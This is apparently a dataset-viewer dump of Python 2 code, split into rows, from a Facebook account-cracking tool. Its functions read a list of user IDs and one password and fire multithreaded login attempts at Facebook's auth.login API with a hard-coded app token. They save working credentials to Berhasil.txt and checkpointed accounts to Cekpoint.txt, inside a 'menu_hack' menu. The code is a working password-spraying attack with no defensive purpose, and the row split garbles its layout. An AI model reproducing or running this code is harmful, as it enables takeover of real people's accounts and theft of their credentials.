text
stringlengths 1
93.6k
|
|---|
global idlist
|
global passw
|
os.system('clear')
|
try:
|
toket = open('login.txt', 'r').read()
|
except IOError:
|
print '\x1b[1;91m[!] Token not found'
|
os.system('rm -rf login.txt')
|
time.sleep(0.01)
|
login()
|
else:
|
os.system('clear')
|
print logo
|
print 52 * '\x1b[1;97m\xe2\x95\x90'
|
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
|
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
|
try:
|
file = open(idlist, 'r')
|
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
|
for x in range(40):
|
zedd = threading.Thread(target=scrak, args=())
|
zedd.start()
|
threads.append(zedd)
|
for zedd in threads:
|
zedd.join()
|
except IOError:
|
print '\x1b[1;91m[!] File not found'
|
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
|
menu_hack()
|
def scrak():
|
global back
|
global berhasil
|
global cekpoint
|
global gagal
|
global up
|
try:
|
buka = open(idlist, 'r')
|
up = buka.read().split()
|
while file:
|
username = file.readline().strip()
|
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
|
data = urllib.urlopen(url)
|
mpsh = json.load(data)
|
if back == len(up):
|
break
|
if 'access_token' in mpsh:
|
bisa = open('Berhasil.txt', 'w')
|
bisa.write(username + ' | ' + passw + '\n')
|
bisa.close()
|
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
|
back += 1
|
else:
|
if 'www.facebook.com' in mpsh['error_msg']:
|
cek = open('Cekpoint.txt', 'w')
|
cek.write(username + ' | ' + passw + '\n')
|
cek.close()
|
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
|
back += 1
|
else:
|
gagal.append(username)
|
back += 1
|
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
|
sys.stdout.flush()
|
except IOError:
|
print '\n\x1b[1;91m[!] Connection busy'
|
time.sleep(0.01)
|
except requests.exceptions.ConnectionError:
|
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
|
def hasil():
|
print
|
print 52 * '\x1b[1;97m\xe2\x95\x90'
|
for b in berhasil:
|
print b
|
for c in cekpoint:
|
print c
|
print
|
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
|
keluar()
|
def super():
|
global toket
|
os.system('clear')
|
try:
|
toket = open('login.txt', 'r').read()
|
except IOError:
|
print '\x1b[1;91m[!] Token not found'
|
os.system('rm -rf login.txt')
|
time.sleep(1)
|
login()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.